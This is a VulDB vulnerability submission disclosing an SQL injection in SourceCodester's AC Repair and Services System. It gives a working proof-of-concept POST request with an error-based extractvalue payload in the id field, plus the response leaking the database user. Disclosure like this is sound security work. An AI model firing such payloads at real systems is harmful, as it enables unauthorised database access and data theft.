Submit #180827: SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.phpinfo

TitleSourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php
DescriptionI find sql injection in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is a sql injection in url/classes/Master.php?f=delete_book. POST /php-acrss/classes/Master.php?f=delete_book HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------25039842273186474810708140780 Content-Length: 906 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="fullname" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="email" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="contact" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="address" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="services[]" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="status" 1 -----------------------------25039842273186474810708140780-- And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}".Obviously, there is an error injection vulnerability here due to insufficient filtering of the id parameter.My suggestion for modification is to use mysqli_real_escape_string() to protect controllable ID parameters from malicious exploitation by hackers, resulting in SQL error injection
Source⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User
 fushuling (UID 45488)
Submission07/11/2023 17:42 (3 years ago)
Moderation07/13/2023 11:49 (2 days later)
StatusAccepted
VulDB entry234012 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_book ID sql injection]
Points20

PreviousOverviewNext